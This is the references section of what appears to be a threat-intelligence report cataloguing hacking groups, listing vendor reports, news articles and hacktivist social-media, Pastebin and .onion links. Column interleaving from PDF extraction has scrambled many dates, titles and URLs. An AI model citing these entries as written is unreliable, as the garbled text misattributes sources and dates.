https://blog.talosintelligence.com/2017/06/palestine-delphi.html
8/05/2018, Security 0wnage, Clearing the MuddyWater -
0
05/10/2017, Lookout, FrozenCell: Multi-platform surveillance
Analysis of new MuddyWater Samples
campaign against Palestinians, https://blog.lookout.com/
4/06/2018, TrendMicro, Another Potential MuddyWater
1 frozencell-mobile-threat
Campaign uses Powershell-based PRB-Backdoor
18/12/2017, Trend Micro, New GnatSpy Mobile Malware Family
10/10/2018, Kaspersky, MuddyWater expands operations Discovered, https://blog.trendmicro.com/trendlabs-security-
intelligence/new-gnatspy-mobile-malware-family-discovered/
8/11/2018, ClearSky, MuddyWater Operations in Lebanon
2
and Oman 16/04/2018, Lookout, Lookout finds new surveillanceware in
Google Play with ties to known threat actor targeting the Middle
0/11/2018, TrendMicro, New PowerShell-based Backdoor
3
East, https://blog.lookout.com/desert-scorpion-google-play
Found in Turkey, Strikingly Similar to MuddyWater Tools
08/07/2018, Check Point, APT Attack In the Middle East: The
07/12/2018, Yoroi, Dissecting the MuddyWater Infection Chain
Big Bang, https://research.checkpoint.com/apt-attack-middle-
0/12/2018, Symantec, Seedworm: Group Compromises
1 east-big-bang/
Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms
25/07/2018, Radware, Micropsia Malware, https://blog.radware.
1/03/2019, 360.net, Suspected MuddyWater APT organization's
2 com/security/2018/07/micropsia-malware/
latest attack activity analysis against Iraqi mobile operator Korek
10/08/2018, Symantec, Ongoing Android Malware Campaign
Telecom
Targets Palestinians - Part 1, https://www.symantec.com/blogs/
10/04/2019, CheckPoint, The Muddy Waters of APT Attacks expert-perspectives/ongoing-android-malware-campaign-targets-
palestinians-part-1
5/04/2019, ClearSky, Iranian APT MuddyWater Attack Infrastructure
1
Targeting Kurdish Political Groups and Organizations in Turkey 31/08/2018, Symantec, Ongoing Android Malware Campaign
Targets Palestinians - Part 2, https://www.symantec.com/blogs/
0/05/2019, Talos, Recent MuddyWater-associated BlackWater
2
expert-perspectives/ongoing-android-malware-campaign-targets-
campaign shows signs of new anti-detection techniques
palestinians-part-2
10/06/2019, TrendMicro, New MuddyWater Activities Uncovered
5/06/2019, 360.net, Analysis of MuddyC3, a New Weapon
2 ATK67
Used by MuddyWater MITRE, Cobalt Group, https://attack.mitre.org/groups/G0080/
26/08/2016, FireEye, RIPPER ATM Malware and the 12 Million Baht
ATK52 Jackpot, https://www.fireeye.com/blog/threat-research/2016/08/
10/11/2014, Kaspersky, The Darkhotel APT ripper_atm_malwarea.html
10/08/2015, Kaspersky, Darkhotel’s attacks in 2015 19/09/2016, TrendMicro, Untangling the Ripper ATM Malware,
https://blog.trendmicro.com/trendlabs-security-intelligence/
09/06/2016, Microsoft, Reverse-engineering DUBNIUM link
untangling-ripper-atm-malware/
0/10/2017, Virus Bulletin, VB2017 paper: Walking in your enemy's
2
16/12/2016, Positive Technologies, COBALT SNATCH, https://
shadow: when fourth-party collection becomes attribution hell
www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-
8/07/2017, BitDefender, Inexsmar: An unusual DarkHotel
1 Snatch-eng.pdf
campaign link
01/06/2017, proofpoint, Microsoft Word Intruder Integrates
3/05/2019, Kaspersky, ScarCruft continues to evolve, introduces
1 CVE-2017-0199, Utilized by Cobalt Group to Target Financial
Bluetooth harvester Institutions, https://www.proofpoint.com/us/threat-insight/post/
microsoft-word-intruder-integrates-cve-2017-0199-utilized-
24/06/2019, Tencent https://s.tencent.com/research/report/741.htm
cobalt-group-target

1/08/2017, Positive Technologies, COBALT STRIKES BACK:
0 0/05/2017, Daily Beast, ‘Dark Overlord’ Hackers Text Death
1
AN EVOLVING MULTINATIONAL THREAT TO FINANCE, https:// Threats to Students, Then Dump Voicemails From Victims, https://
www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt- www.thedailybeast.com/dark-overlord-hackers-text-death-threats-
2017-eng.pdf to-students-then-dump-voicemails-from-victims
7/08/2017, TrendMicro,Backdoor-carrying Emails Set Sights
0 3/03/2018, Global Legal Post, US law firm hack hits global
1
on Russian-speaking Businesses, https://blog.trendmicro.com/ insurer, http://www.globallegalpost.com/big-stories/us-law-firm-
trendlabs-security-intelligence/backdoor-carrying-emails-set- hack-hits-global-insurer-15490236/
sights-on-russian-speaking-businesses/
6/05/2018, Bleeping Computer, Suspected Member of
1
5/08/2017, Group-IB, Secrets of Cobalt, https://www.group-
1 TheDarkOverlord Hacking Group Arrested in Serbia, https://
ib.com/blog/cobalt www.bleepingcomputer.com/news/security/suspected-member-
of-thedarkoverlord-hacking-group-arrested-in-serbia/
0/11/2017, TrendMicro, Cobalt Strikes Again: Spam Runs Use
2
Macros and CVE-2017-8759 Exploit Against Russian Banks, 7/09/2018, Digital Shadows, Thedarkoverlord Out to KickAss
2
https://blog.trendmicro.com/trendlabs-security-intelligence/ and Cash Out Their Data, https://www.digitalshadows.com/
cobalt-spam-runs-use-macros-cve-2017-8759-exploit/ blog-and-research/thedarkoverlord-out-to-kickass-and-cash-
out-their-data/
2/11/2017, ReversingLabs, ReversingLabs’ YARA rule detects
2
a Cobalt payload exploiting CVE-2017-11882, https://blog. 2/01/2019, Forbes, Who Is The Dark Overlord Threatening To
0
reversinglabs.com/blog/reversinglabs-yara-rule-detects-cobalt- Leak Sensitive 9/11 Documents?, https://www.forbes.com/sites/
payload-exploiting-cve-2017-11882 kateoflahertyuk/2019/01/02/hacking-group-the-dark-overlord-
threatens-to-leak-sensitive-911-documents/
4/11/2017, BleepingComputer, A Hacking Group Is Already Exploiting
2
the Office Equation Editor Bug-, https://www.bleepingcomputer. 0/01/2019, DataBreaches.net, “Crafty Cockney,” associate of
1
com/news/security/a-hacking-group-is-already-exploiting-the- thedarkoverlord, fighting extradition to the U.S. after being charged
office-equation-editor-bug/ with hacking, extorting, U.S. medical entities in 2016, https://www.
databreaches.net/crafty-cockney-associate-of-thedarkoverlord-
8/11/2017, RISKIQ, Gaffe Reveals Full List of Targets in Spear
2
fighting-extradition-to-the-u-s-after-being-charged-with-hacking-
Phishing Attack Using Cobalt Strike Against Financial Institutions,
extorting-u-s-medical-entities-in-2016/
https://www.riskiq.com/blog/labs/cobalt-strike/
8/01/2019, CyberScoop, The Dark Overlord was recruiting
0
6/01/2018, RISKIQ, First Activities of Cobalt Group in 2018:
1
employees and looking for attention before 9/11 data dump,
Spear Phishing Russian Banks, https://www.riskiq.com/blog/labs/
https://www.cyberscoop.com/dark-overlord-recruiting-employees-
cobalt-group-spear-phishing-russian-banks/
looking-attention-911-data-dump/
8/02/2018, Crowdstrike, 2018 Global Threat Report, https://
1
4/01/2019, SenseCy, What will The Dark Overlord Do Next – a
2
crowdstrike.lookbookhq.com/global-threat-report-2018-web/
CTI Assessment, https://blog.sensecy.com/2019/01/24/the-dark-
cs-2018-global-threat-report
overlord-and-the-9-11-papers-leak-whats-next/
6/03/2018, EUROPOL, Mastermind behind EUR 1 billion cyber
2
bank robbery arrested in Spain, https://www.europol.europa.eu/ ATK77
newsroom/news/mastermind-behind-eur-1-billion-cyber-bank- 7/07/2018, PaloAlto, New Threat Actor Group DarkHydrus
2
robbery-arrested-in-spain Targets Middle East Government
ATK73 6/01/2019, 360.net, Latest Target Attack of DarkHydruns
1
Group Against Middle East
4/07/2016, Bankinfo Security, ‘The Dark Overlord’ Advertises
1
Stolen Source Code, https://www.bankinfosecurity.com/dark-
overlord-sells-source-code-a-9260 ATK78
9/06/2018 [Retrieved: 11/06/2019], Symantec, Thrip: Espionage
1
6/11/2016, Motherboard, Hackers Threaten Release of Atlanta
1 Group Hits Satellite, Telecoms, and Defense Companies, https://
Professional Athletes’ Medical Data, https://www.vice.com/en_us/ www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-
article/8q8e33/hackers-threaten-release-of-atlanta-professional- telecoms-defense-targets
athletes-medical-data
MITRE, Thrip, https://attack.mitre.org/groups/G0076/
7/11/2016, Motherboard, Hackers Claim Theft of Data from
1
Gorilla Glue, https://www.vice.com/en_us/article/53dq8k/ ATK80
hackers-claim-theft-of-data-from-gorilla-glue
AlienVault, Golden Rat
5/09/2016, Vocativ, Man Connected To Pippa Middleton Hack
2
Reveals Exclusive Details, https://www.vocativ.com/362147/ 4/01/2018, 360.net, Goldmouse Organization - Targeted
0
pippa-middleton-hack-photos-arrest-uk/ Attacks in Syria (english)
6/07/2016, Digital Shadows, Thedarkoverlord – losing his

2 3/07/2018, Cybaze, Chinese APT 27’s long-term espionage
2
patients?, https://www.digitalshadows.com/blog-and-research/ campaign in Syria is still ongoing
thedarkoverlord-losing-his-patients/ 9/03/2019, 360.net, APT-C-27 (Goldmouse): Suspected Target
1
8/09/2016, HackRead, DarkNet Hackers ‘DarkOverlord’ Hack
2 Attack against the Middle East with WinRAR Exploit
WestPark Capital Bank for Ransom, https://www.hackread.com/
darkoverlord-hacks-westpark-capital-bank/ ATK83
0/01/2019, Singapore's Committee of Inquiry, Public Report of
1
8/11/2016, Graham Cluley, No, I won’t help you blackmail
2 the Committee of Inquiry (COI) into the cyber attack on Singapore
the company you just hacked, https://www.grahamcluley.com/ Health Services Private Limited Patient Database
gorilla-glue-blackmail/
6/03/2019, Symantec, Whitefly: Espionage Group has
0
9/06/2016, Bankinfo Security, Here’s How a Hacker Extorts
2 Singapore in Its Sights
a Clinic, http://www.bankinfosecurity.com/blogs/heres-how-
hacker-extorts-clinic-p-2168 19/03/2019, NSHC, SectorM04 Targeting Singapore – An Analysis
2/05/2017, Motherboard, Meet the Hackers Holding Netflix
0 ATK86
to Ransom, https://www.vice.com/en_us/article/ae5w7a/meet-
the-hackers-holding-netflix-to-ransom 1/11/2017. Kaspersky, Silence – a new Trojan attacking financial
0
organizations, https://securelist.com/the-silence/83009/
217
References _
5/09/2018, Group IB, Silence Moving into the Darkside, https://

0 27/April/2015, pwc, Attacks against Israeli & Palestinian interests,
www.group-ib.com/blog/silence https://pwc.blogs.com/cyber_security_updates/2015/04/attacks-
against-israeli-palestinian-interests.html
5/09/2018, ZDnet, New Silence hacking group suspected of
0
having ties to cyber-security industry, https://www.zdnet.com/ 28/September/2015, Kaspersky, Gaza cybergang, where’s your
article/new-silence-hacking-group-suspected-of-having-ties-to- IR team?, https://securelist.com/gaza-cybergang-wheres-your-
cyber-security-industry/ ir-team/72283/
4/01/2019, Reaqta, Silence group targeting Russian Banks via
2 January/2016, ClearSky, Operation DustySky, https://www.
Malicious CHM, https://reaqta.com/2019/01/silence-group- clearskysec.com/wp-content/uploads/2016/01/Operation%20
targeting-russian-banks/ DustySky_TLP_WHITE.pdf
3/07/2019, Bleeping Computer, Silence Group Likely Behind
0 June/2016, ClearSky, Operation DustySky Part 2, https://www.
Recent $3M Bangladesh Bank Heist, https://www.bleepingcomputer. clearskysec.com/wp-content/uploads/2016/06/Operation-
com/news/security/silence-group-likely-behind-recent-3m- DustySky2_-6.2016_TLP_White.pdf
bangladesh-bank-heist/
3 1/January/2017, Security Week,Gaza Cybergang Uses
1/08/2019, Group IB, Silence 2.0 Going Global, https://www.
2 QuasarRAT to Target Governments,https://www.securityweek.
group-ib.com/resources/threat-research/silence_2.0.going_global.pdf com/gaza-cybergang-uses-quasarrat-target-governments
11/April/2017, FireEye, CVE-2017-0199: In the Wild Attacks
ATK88 Leveraging HTA Handler, https://www.fireeye.com/blog/threat-
1/04/2016, FireEye, FOLLOW THE MONEY: DISSECTING THE
0 research/2017/04/cve-2017-0199-hta-handler.html
OPERATIONS OF THE CYBER CRIME GROUP FIN6, https://
www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf 30/October/2017, Security Week, Hamas-Linked ‘Gaza Cybergang’
Has New Tools, Targets, https://www.securityweek.com/hamas-
5/06/2016, Secure Week, New FrameworkPOS Campaign Gains
1 linked-gaza-cybergang-has-new-tools-targets
Momentum, https://www.securityweek.com/new-frameworkpos-
campaign-gains-momentum 30/October/2017, Kaspersky, Gaza Cybergang – updated activity
in 2017,l https://securelist.com/gaza-cybergang-updated-2017-
6/07/2016, NJCCIC, FrameworkPOS, https://www.cyber.nj.gov/
0 activity/82765/
threat-profiles/pos-malware-variants/frameworkpos
30/January/2018, International Business TImes, TopHat campaign:
1/09/2018, Malware Analysis, X-Force IRIS Identifies FIN6
0 Hackers target Middle East using malware-laced Arabic files about
Activity on POS Networks,https://malware.news/t/x-force-iris- political events, https://www.ibtimes.co.uk/tophat-campaign-
identifies-fin6-activity-on-pos-networks/22509 hackers-target-middle-east-using-malware-laced-arabic-files-
5/09/2018, ZDNet, FIN6 returns to attack retailer point of
0 about-political-events-1657217
sale systems in US, Europe, https://www.zdnet.com/article/fin6- 12/April/2018, Kaspersky, Operation Parliament, who is doing
returns-to-attack-retailers-in-us-europe/ what?, https://securelist.com/operation-parliament-who-is-
1/02/2019, Visa Payment Fraud Disruption, FIN6 Cybercrime
0 doing-what/85237/
Group Expands Threat to eCommerce Merchants, https://usa. 09/July/2018, Security Week, New Attacks on Palestine Linked to
visa.com/dam/VCOM/global/support-legal/documents/fin6- ‘Gaza Cybergang’, https://www.securityweek.com/new-attacks-
cybercrime-group-expands-threat-To-ecommerce-merchants.pdf palestine-linked-gaza-cybergang
5/04/2019, FireEye, Pick-Six: Intercepting a FIN6 Intrusion,
0 12/September/2018, GitHub, ThreatHunter-Playbook/playbooks/
an Actor Recently Tied to Ryuk and LockerGoga Ransomware, groups/Molerats.md, https://github.com/Cyb3rWard0g/ThreatHunter-
https://www.fireeye.com/blog/threat-research/2019/04/pick- Playbook/blob/master/playbooks/groups/Molerats.md
six-intercepting-a-fin6-intrusion.html
1 0/April/2019, Kaspersky, The Gaza cybergang and its
ATK89 SneakyPastes campaign, https://www.kaspersky.com/blog/
gaza-cybergang/26363/
3/January/2012, Walla, ‫ןוליאל שא םיבישמ םירקאהה‬, ‫םיהות תשרבו‬
1
‫ויתונווכ לע‬, https://news.walla.co.il/item/2500063 14/February/2019, 360 Threat Intelligence, Suspected Molerats’
New Attack in the Middle East, https://ti.360.net/blog/articles/
2/July/2013, Threat Post, njRAT Espionage Malware Targets
0 suspected-molerats-new-attack-in-the-middle-east-en/
Middle Eastern Governments, Telecoms and Energy, https://
threatpost.com/njrat-espionage-malware-targets-middle-eastern- 2 3/April/2019, ‫ימואלה רבייסה ךרעמ‬, ‫ הפיקתה תצובק‬Gaza
governments-telecoms-and-energy/101162/ Cybergang, https://www.gov.il/BlobFolder/reports/gaza-cybergang/
he/GazaCybergang-CERT-IL-W-908.pdf
3/August/2013, Fire Eye, Operation Molerats: Middle East
2
Cyber Attacks Using Poison Ivy, https://www.fireeye.com/blog/
threat-research/2013/08/operation-molerats-middle-east-cyber- ATK91
attacks-using-poison-ivy.html ecember, 14, 2017, FireEye, Attackers Deploy New ICS Attack
D
Framework “TRITON” and Cause Operational Disruption to
9/February/2014, FireEye, XtremeRAT: Nuisance or Threat?,
1 Critical Infrastructure
https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-
nuisance-or-threat.html June, 07, 2018, FireEye, A Totally Tubular Treatise on TRITON
and TriStation
2/June/2014, FireEye, Molerats, Here for Spring!, https://
0
www.fireeye.com/blog/threat-research/2014/06/molerats-here- O ctober, 23, 2018, FireEye, TRITON Attribution: Russian
for-spring.html Government-Owned Lab Most Likely Built Custom Intrusion Tools
for TRITON Attackers
4/June/2014, Dark Reading, Molerats Go After Governments,
0
US Financial Institution, https://www.darkreading.com/molerats- February, 25, 2019, DragoS, Evolution of ICS Attacks and the
go-after-governments-us-financial-institution/d/d-id/1269423 Prospects for Future Disruptive Events
ebruary/2015, Kaspersky, The Desert Falcons Targeted attacks,
F April, 10, 2019, FireEye, TRITON Actor TTP Profile, Custom
https://media.kasperskycontenthub.com/wp-content/uploads/ Attack Tools, Detections, and ATT&CK Mapping
sites/43/2018/03/08064309/The-Desert-Falcons-targeted- June, 14, 2019, Dragos, Threat Proliferation in ICS Cybersecurity:
attacks.pdf XENOTIME Now Targeting Electric Sector, in Addition to Oil and Gas

ctober, 12, 2017, The Conversation, http://theconversation.
O ATK103
com/russie-arabie-saoudite-un-rapprochement-qui-agace- 7/09/2017, Proofpoint, Threat Actor Profile: TA505, From
2
washington-85475 Dridex to GlobeImposter
J une, 21, 2018, Le Monde, https://www.lemonde.fr/economie/ 08/06/2018, Proofpoint, TA505 shifts with the times
article/2018/06/21/petrole-l-arabie-saoudite-et-la-russie-font-
front-commun-face-a-l-iran_5318906_3234.html 9/07/2018, Proofpoint, TA505 Abusing SettingContent-ms
1
within PDF files to Distribute FlawedAmmyy RAT
2019, DragoS, https://dragos.com/resource/xenotime/
5/11/2018, Proofpoint, tRat: New modular RAT appears in
1
ATK 92 multiple email campaigns
MITRE, Gorgon Group, https://attack.mitre.org/groups/G0078/ 3/12/2018, Proofpoint, From Thanksgiving to Christmas,
0
cybercriminals cash in on a range of threats over the holidays
heck Point, Njrat, https://threatpoint.checkpoint.com/ThreatPortal/
C
threat?threatId=9478&threatType=malwarefamily 5/04/2019, Cybereason, Threat Actor TA505 Targets Financial
2
Enterprises Using LOLBins and a New Backdoor Malware
MITRE, Crimson, https://attack.mitre.org/software/S0115/
8/05/2019, ESTsecurity, TA505 organization, spreads malicious
0
4/03/2016, threat post, https://threatpost.com/espionage-
0
e-mail disguised as Excel document again
malware-watering-hole-attacks-target-diplomats/116600/
16/05/2019, Yoroi, The Stealthy Email Stealer in the TA505 Arsenal
9/01/2017, NJCCIC, NJRat, https://www.cyber.nj.gov/threat-
1
profiles/trojan-variants/njrat 2/06/2019, TrendMicro, Shifting Tactics: Breaking Down
1
TA505 Group’s Use of HTML, RATs and Other Techniques in
7/10/2017, paloalto, Tracking Subaat: Targeted Phishing Attack
2
Latest Campaigns
Leads to Threat Actor’s Repository, https://unit42.paloaltonetworks.
com/unit42-tracking-subaat-targeted-phishing-attacks-point- 2/07/2019, Proofpoint, TA505 begins summer campaigns with
0
leader-threat-actors-repository/ a new pet malware downloader, AndroMut, in the UAE, South
Korea, Singapore, and the United States
1/01/2018,NJCCIC, Quasar RAT, https://www.cyber.nj.gov/
3
threat-profiles/trojan-variants/quasar-rat
ATK104
2/08/2018, paloalto, The Gorgon Group: Slithering Between
0 5/05/2019, Proofpoint, Threat Actor Profile: TA542, From
1
Nation State and Cybercrime, https://unit42.paloaltonetworks. Banker to Malware Distribution Service
com/unit42-gorgon-group-slithering-nation-state-cybercrime/
8/02/2018, Crowdstrike, Meet CrowdStrike’s Adversary of the
0
2/10/2018, Krebs on Security, Who Is Agent Tesla?, https://
2 Month for February: MUMMY SPIDER
krebsonsecurity.com/tag/nanocore-rat/
7/04/2019, paloalto, Aggah Campaign: Bit.ly, BlogSpot, and
1 ATK112
Pastebin Used for C2 in Large Scale Campaign, https://unit42. 3/05/2018, Kaspersky SecureList, https://securelist.com/whos-
0
paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and- who-in-the-zoo/85394/
pastebin-used-for-c2-in-large-scale-campaign/
7/05/2019, 360.cn, Saber lion organization (APT-C-38) attack
2
8/04/2019, Bleeping Computer, https://www.bleepingcomputer.
1 activity revealed (translate)
com/news/security/revengerat-distributed-via-bitly-blogspot-and-
pastebin-c2-infrastructure/ ATK113
6/01/2019, ZDNet, NanoCore Trojan is Protected in Memory
1 1/05/2016, FireEye, Threat Actor Leverages Windows Zero-day
1
from being Killed off, https://www.zdnet.com/article/nanocore- Exploit in Payment Card Data Attacks
trojan-stops-you-killing-its-process/ 0/06/2017, Root9B, SHELLTEA + POSLURP MALWARE MEMORY-
2
RESIDENT POINT-OF-SALE MALWARE ATTACKS IN DUSTRY
ATK97
0/08/2014, Kaspersky, “El Machete”, https://securelist.com/
2 0/06/2019, Morphisec, FIN8 is Back in Business, Targeting
1
el-machete/66108/ the Hospitality Industry
2/03/2017, Threat Vector, Defending against El Machete's

2 ATK116
Malware Attacks, https://threatvector.cylance.com/en_us/home/ 4/01/2013, Kaspersky, “Red October” Diplomatic Cyber Attacks
1
defending-against-el-machetes-malware-attacks.html Investigation, https://securelist.com/red-october-diplomatic-cyber-
4/07/2017, IBTimes, El Machete hackers cut through the
2 attacks-investigation/36740/
globe stealing over 100GB data from governments, https://www. 7/01/2013, Kaspersky, “Red October” – Part Two, the Modules,
1
ibtimes.co.uk/el-machete-hackers-cut-through-globe-stealing- https://securelist.com/red-october-part-two-the-modules/57645/
over-100gb-data-governments-1613500
9/12/2014, Symantec, Blue Coat Exposes “The Inception
0
5/08/2019, ZDnet, A cyber-espionage group has been stealing
0 Framework”; Very Sophisticated, Layered Malware Attack Targeted
files from the Venezuelan military, https://www.zdnet.com/ at Military, Diplomats, and Bus, https://www.symantec.com/
article/a-cyber-espionage-group-has-been-stealing-files-from- connect/blogs/blue-coat-exposes-inception-framework-very-
the-venezuelan-military/ sophisticated-layered-malware-attack-targeted-milit
5/08/2019, ESET, ESET discovers government targets under
0 0/12/2014, Kaspersky, Cloud Atlas: RedOctober APT is back
1
attack by cyber spies stealing gigabytes of confidential document, in style, https://securelist.com/cloud-atlas-redoctober-apt-is-
https://www.eset.com/us/about/newsroom/press-releases/ back-in-style/68083/
eset-discovers-government-targets-under-attack-by-cyber-spies-
stealing-gigabytes-of-confidential-doc/ 4/03/2018, Symantec, Inception Framework: Alive and Well,
1
and Hiding Behind Proxies, https://www.symantec.com/blogs/
5/08/2019, ESET, MACHETE JUST GOT SHARPER, https://www.
0 threat-intelligence/inception-framework-hiding-behind-proxies
welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
5/11/2018, PaloAlto, Inception Attackers Target Europe with
0
6/08/2019, Homeland Security Today, Secretive ‘Machete’
0 Year-old Office Vulnerability, https://unit42.paloaltonetworks.
Hacker Group Steals GBs Worth of Sensitive Files from the com/unit42-inception-attackers-target-europe-year-old-office-
Venezuelan Military, https://www.hstoday.us/subject-matter-areas/ vulnerability/
cybersecurity/secretive-machete-hacker-group-steals-gbs-worth-
of-sensitive-files-from-the-venezuelan-military/ 2/08/2019, Kaspersky, Recent Cloud Atlas activity, https://
1
securelist.com/recent-cloud-atlas-activity/92016/
219
References _
ATK117 ATK124
5/01/2018, TrendMicro, New KillDisk Variant Hits Financial
1 8/2019, Know Your Meme, Chuckling Squad Hacks, https://
0
Organizations in Latin America, https://blog.trendmicro.com/ knowyourmeme.com/memes/events/chuckling-squad-hacks
trendlabs-security-intelligence/new-killdisk-variant-hits-financial-
31/08/2019, BBC, Twitter CEO and co-founder Jack Dorsey has
organizations-in-latin-america/
account hacked, https://www.bbc.com/news/technology-49532244
2/06/2018, Bluvector, Lazarus Group Uses KillDisk as a
1
30/08/2019, BBC, Twitter C.E.O. Jack Dorsey’s Account Hacked,
Distraction for SWIFT Attacks, https://www.bluvector.io/threat-
https://www.nytimes.com/2019/08/30/technology/jack-dorsey-
report-lazarus-group-killdisk-swift/
twitter-account-hacked.html
3/10/2018, FireEye, APT38: Un-Usual Suspects, https://content.
0
24/08/2019, BBC, After Shane Dawson, Hackers Come For
fireeye.com/apt/rpt-apt38
James Charles, https://dankanator.com/26229/after-shane-
5/08/2019, Reuters, North Korea took $2 billion in cyberattacks
0 dawson-hackers-james-charles/
to fund weapons program: U.N. report, https://www.reuters.com/
article/us-northkorea-cyber-un/north-korea-took-2-billion-in-cyber- ATK125
attacks-to-fund-weapons-program-u-n-report-idUSKCN1UV1ZX https://twitter.com/iznaye
ATK120 https://twitter.com/Baronnet_Noir
Dragos, HEXANE, https://dragos.com/resource/hexane/ https://twitter.com/xslncd
7/08/2019, Dell Secureworks, LYCEUM Takes Center Stage
2 https://twitter.com/MrWolf03683135
in Middle East Campaign, https://www.secureworks.com/blog/
14/04/2019, Defcon-lab, Hacktivismo – OpEcuador – Continuação
lyceum-takes-center-stage-in-middle-east-campaign
(2), https://www.defcon-lab.org/hacktivismo-opecuador-
7/08/2019, Threat Post, Oil and Gas Firms Targeted By New
2 continuacao-2/
LYCEUM Threat Group, https://threatpost.com/oil-and-gas-firms-
14/04/2019, Defcon-lab, Hacktivismo – OpEcuador – Continuação
targeted-by-new-lyceum-threat-group/147705/
(3), https://www.defcon-lab.org/hacktivismo-opecuador-
continuacao-3/
ATK121
https://twitter.com/CyberGhost404 01/05/2019, Rogue Media Labs, xS1lenc3d of Iznaye Dumps
+70,000 Customer Emails Online Following Attack on The Forums
https://www.youtube.com/channel/UCqMhJooh1DU1eegH5jSv5gQ of Peugeot France , https://roguemedialabs.com/2019/05/01/
8/04/2019, Records from Over Two Dozens Local Police
1 xs1lenc3d-of-iznaye-dumps-70000-customer-emails-online-
Departments Across The UK Hacked & Leaked Online by following-attack-on-the-forums-of-peugot-france/
CyberGhost404, https://roguemedialabs.com/2019/04/18/
records-from-over-two-dozens-local-police-departments-across- ATK126
the-uk-hacked-leaked-online-by-cyberghost404/ English Dark-Web Forum
06/08/2019, Vietnamnet, Hacker Phillippines tấn công
web Việt Nam, trả đũa việc bị mất Facebook, https:// ATK127
vietnamnet.vn/vn/cong-nghe/bao-mat/hacker-phillippines-tan- https://twitter.com/DemonSad3
cong-web-viet-nam-tra-dua-viec-bi-mat-facebook-556466.html https://www.youtube.com/channel/UCACXA7rvIHzSksCzsH-ED2Q
ATK122 https://pastebin.com/u/DemonSad3
https://www.facebook.com/Anonymous-ARG-448319398567509
ATK128
https://www.facebook.com/OperationArgentina/ 6/06/2016, Tech Crunch, Zuckerberg’s Twitter, Pinterest,
0
https://by-clips.com/channel/UCh52_wDpwZP4tXp97XtKAqg LinkedIn accounts hacked, https://techcrunch.com/2016/06/06/
zuckerbergs-twitter-pinterest-linkedin-accounts-hacked/
https://www.youtube.com/channel/UCSWZ7Q6v6Q7Bi-NymMabCIA
2 7/06/2016, Venture Beat, OurMine hacks Google CEO
https://twitter.com/anonymouswararg Sundar Pichai’s Quora and Twitter accounts , https://venturebeat.
https://twitter.com/AnonymousArgOfi com/2016/06/27/ourmine-hackers-break-into-google-ceo-
sundar-pichais-quora-and-twitter-accounts/
ATK123 14/07/2016, Hacked, Hacking Group OurMine Claim HSBC
https://twitter.com/Anon_ITA Servers Takedown, https://hacked.com/hacking-group-ourmine-
claim-hsbc-servers-takedown/
https://twitter.com/OperationItaly
1 8/07/2016, International Business Times, ‘Pokemon Go’
https://twitter.com/Anon_Otherwise
Servers Brought Down By OurMine DDoS Attack, https://www.
https://www.anon-italy.blogspot.it/ ibtimes.com/pokemon-go-servers-brought-down-ourmine-ddos-
attack-2392273
https://www.youtube.com/channel/UCicIdxizhftaMDXljKPRKRg
26/07/2016, Gizmodo, The Group That Hacked Mark Zuckerberg
http://f7qiyb3e7h2cp3ku.onion
Is Now Going After News Sites, https://gizmodo.com/the-group-
1/05/2015, La Stampa, Il blitz della postale contro Anonymous:
2 that-hacked-mark-zuckerberg-is-now-going-afte-1784308701
i dettagli, https://www.lastampa.it/tecnologia/2015/05/21/news/
28/08/2016, BuzzFeed, Hackers Gain Access To Uber CEO
il-blitz-della-postale-contro-anonymous-i-dettagli-1.35264323
Travis Kalanick’s Twitter, https://www.buzzfeednews.com/
1/12/2018, Edoardo Limone, Cyber Attacchi in Italia: un
1 article/josephbernstein/hackers-gain-access-to-uber-ceo-travis-
calendario e tante riflessioni, https://www.edoardolimone. kalanicks-twitter
com/blog/2018/12/11/cyber-attacchi-in-italia-un-calendario-
04/10/2016,BuzzFeed , This Saudi Teen Is Probably Behind The
e-tante-riflessioni/
Hacks Of Dozens Of Tech CEOs And Celebrities, https://www.
buzzfeednews.com/article/josephbernstein/this-saudi-teen-is-
probably-behind-the-hacks-of-dozens-of-te

5/10/2016, The Guardian, BuzzFeed hacked by OurMine after it
0 6/04/2019, Blogger Engineer, Pinoy LulzSec continues annual
0
claimed to unmask one of its members, https://www.theguardian. #AprilLulz tradition, http://bloggerengineer.com/pinoy-lulzsec-
com/technology/2016/oct/05/buzzfeed-hack-ourmine-ahmad- continues-annual-aprillulz-tradition/
makki-facebook-google
5/04/2019, Blogger Engineer, Pinoy LulzSec hacks CebPac’s
2
1/12/2016, CNET, The NFL just got hacked on Twitter, https://
2 GetGo; warns large data breach, http://bloggerengineer.com/
www.cnet.com/news/nfl-hack-twitter-ourmine/ pinoy-lulzsec-hacks-cebpacs-getgo-warns-large-data-breach/
7/08/2017, Gizmodo, Helpless HBO Gets Wrecked by Hackers
1 0/04/2019. Blogger Engineer, Hackers compromise websites of
3
Yet Again, https://gizmodo.com/helpless-hbo-gets-wrecked-by- Philippine Army, AFPSLAI, http://bloggerengineer.com/hackers-
hackers-yet-again-1797923587 compromise-websites-of-philippine-army-afpslai/
1/08/2017, HackRead, WikiLeaks official website hacked by
3
OurMine hacking group, https://www.hackread.com/wikileaks- ATK130
official-website-hacked-ourmine-hacking-group/ https://twitter.com/fallaga_team
5/09/2017, Gizmodo, Welp, Vevo Just Got Hacked, https://
1 https://www.facebook.com/Official.Fallaga/
gizmodo.com/welp-vevo-just-got-hacked-1813390834 0/01/2015, Nawaat, Fellagas: an Interview with Tunisia’s
1
https://www.ourmine.org/ Islamists hackers, https://nawaat.org/portail/2015/01/10/
fellagas-an-interview-with-tunisias-islamits-hackers/
ATK129 5/01/2015, Security Week, Notepad++ Site Hacked in
1
https://twitter.com/Pinoy_LulzSec Response to “Je suis Charlie” Edition, https://www.securityweek.
com/notepad-site-hacked-response-%E2%80%9Cje-suis-
https://twitter.com/PinoyLulzSec
charlie%E2%80%9D-edition
https://twitter.com/PinoyLulzSec__ (suspended since April 2019)
5/01/2015, Mashable, France: 19,000 Websites Hacked Since
1
https://www.facebook.com/LulzsecPH/ Charlie Hebdo Attack, https://mashable.com/2015/01/15/
france-cyberattacks-charlie-hebdo/
https://www.facebook.com/Pinoy-LulSec-163230157452851/
6/01/2015, MEMRI, Pro-ISIS, Other Muslim Hackers Declare
1
https://www.facebook.com/groups/Anonymous.Phi/
